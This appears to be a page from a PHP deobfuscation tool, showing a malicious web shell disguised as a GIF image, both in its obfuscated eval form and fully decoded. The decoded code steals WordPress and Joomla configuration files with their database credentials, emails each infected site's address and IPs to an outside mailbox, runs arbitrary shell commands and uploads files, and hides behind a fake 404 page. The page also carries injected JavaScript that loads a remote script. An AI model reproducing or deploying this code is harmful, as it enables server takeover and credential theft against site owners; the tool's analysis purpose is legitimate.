Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
GIF89a<?php eval(gzinflate(base64_decode(strrev(str_rot13('iuCbtOjTCtQC5k8OOC2K/to9nSO0n2..
Decoded Output download
if(isset($_GET['j'])){
$p1="../../../../../../../";
$p2="../../../../../../";
$p3="../../../../../";
$p4="../../../../";
$p5="../../../";
$p6="../../";
$p7="../";
$j=file_get_contents($p1."configuration.php");
if(!$j){
$j=file_get_contents($p2."configuration.php");
if(!$j){
$j=file_get_contents($p3."configuration.php");
if(!$j){
$j=file_get_contents($p4."configuration.php");
if(!$j){
$j=file_get_contents($p5."configuration.php");
if(!$j){
$j=file_get_contents($p6."configuration.php");
if(!$j){
$j=file_get_contents($p7."configuration.php");
if(!$j){$j=file_get_contents("configuration.php");
}
}
}
}
}
}
}
echo $j;
exit;
}
if(isset($_GET['w'])){
$p1="../../../../../../../";
$p2="../../../../../../";
$p3="../../../../../";
$p4="../../../../";
$p5="../../../";
$p6="../../";
$p7="../";
$w=file_get_contents($p1."wp-config.php");
if(!$w){
$w=file_get_contents($p2."wp-config.php");
if(!$w){
$w=file_get_contents($p3."wp-config.php");
if(!$w){$w=file_get_contents($p4."wp-config.php");
if(!$w){$w=file_get_contents($p5."wp-config.php");
if(!$w){$w=file_get_contents($p6."wp-config.php");
if(!$w){$w=file_get_contents($p7."wp-config.php");
if(!$w){$w=file_get_contents("wp-config.php");
}
}
}
}
}
}
}
echo $w;
exit;
}
if (!isset($_SESSION['bajak'])) {
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "Setoran Shells
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {
$security= "SAFE_MODE = OFF G-one irc.private.id";
}else {
$security= "SAFE_MODE = ON G-one irc.private.id";
};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","Hasil Bajakan http://$web$inj
$security
IP Server = $serper
IP Injector= $injektor");
$_SESSION['bajak'] = 0;
}else {
$_SESSION['bajak']++;
};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti = $_SERVER['DOCUMENT_ROOT'].'/'.'wpa.php';
rename($source, $desti);
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {
$security= "SAFE_MODE : OFF G-one irc.private.id";
}else {
$security= "SAFE_MODE : ON G-one irc.private.id";
}
echo "<title>-= pl@NETWORK =-</title><br>";
echo "<font size=5 color=#64D300>We Are Not Hacker !<br>";
echo "<font size=4 color=#64D300>Server : irc.private.id 6667<br>";
echo "<font size=3 color=#64D300>Status : UpTime Top Ranking<br><br>";
echo "<font size=2 color=#64D300><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#64D300><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#64D300><b>Uname : ".php_uname()."</b><br>";
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';
}else{
return $cwd;
};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';
}else{
return $cwd;
};
};
}
if(isset($_GET['220'])){
echo '<form method="POST" action=""><font size=2 color=#64D300><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="eXcute"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#64D300><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#64D300><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){
$name = $_FILES['userfile']['name'];
};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else {
echo "Upload Success to ".$uploaddir.$name." Boss ";
}
}
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#FFF5EE>".shell_exec($cmd)."</font></pre>";
}
elseif(isset($_GET['220'])){
$comd = $_GET['220'];
echo "<pre><font size=3 color=#64D300>".shell_exec($comd)."</font></pre>";
echo "<pre><font size=3 color=#64D300>".shell_exec('ls -la')."</font></pre>";
} else {
header("HTTP/1.0 404 Not Found");
header("Status: 404 Not Found");
echo "<h1>Error 404 Not Found</h1>";
echo "The requested URL was not found on this server.";
die();
exit();
}
echo "<br><br><center><font size=4 color=#FFF5EE>We <font size=4 color=#FF0000>Are<font size=4 color=white> Not <font size=4 color=#FFF5EE>Hacker</center></br>";
?>
<link REL="SHORTCUT ICON" HREF="http://www.forum.romanisti-indonesia.com/Smileys/default/b_indonesia.gif"></link><body bgcolor="#000000"><script type="text/javascript">if (self==top) {
function netbro_cache_analytics(fn, callback) {
setTimeout(function() {
fn();
callback();
}, 0);
}
function sync(fn) {
fn();
}
function requestCfs(){
var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");
var idc_glo_r = Math.floor(Math.random()*99999999999);
var url = idc_glo_url+ "cfs2.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "ms=" + "4TtHaUQnUEiP6K%2fc5C582HVlH3eBnL31rJNUX05ZwZQwqeKiO619Ix4klxD2xNBOIi3iGPZ1r88qO65b%2bYaLsIqOqYRoIkEWUs3l9pAKCEfbwhu30sORyWA5UY%2bnkGV23NMrHoCofHIQHqHEQp82ZmkVU%2fkXofJJXjn7I4Alj024rVyK%2f2kVqHlkiahyrwrGAqe1AHM9iPvr7Wf3GehZ9vNT4b2Q%2bEyAd1A3YbxW7FrCYfw29e8SGGMzYUViQYZllu7110X6MRNcJWQyUEOt2AkYhsQH4sI1Sh%2bld7mQpIruClvMC65vB%2bzGjOe2yqlG7gklnkOWVAOImvkqyr2Fv8Yg1ie%2bPPnRA0lWU2%2fm%2b0sQ89f819IPCd0s6ZIoxnGVBy3YeXw5RGeKOTFTPF2pLL0J%2fgZQfCKe4drtC5cvPgCfYym6m3JD3008aYrH6b7xOcWDJtSdcBs6YpsMmzpKRTP5Ocwm7azk9FW8WIa4%2bDhaHk8YmZujOPM4esjQFTsaxq%2bowheRh%2fU6Nxk6oWbIw1lGQyH%2fz5Xq" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;
var bsa = document.createElement('script');
bsa.type = 'text/javascript';
bsa.async = true;
bsa.src = url;
(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);
}netbro_cache_analytics(requestCfs, function(){});
};
</script></body>
Did this file decode correctly?
Original Code
GIF89a<?php
eval(gzinflate(base64_decode(strrev(str_rot13('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')))));
?>
Function Calls
strrev | 1 |
gzinflate | 1 |
str_rot13 | 1 |
base64_decode | 1 |
Stats
MD5 | f06e27be7e69771812f16a718f939a45 |
Eval Count | 1 |
Decode Time | 55 ms |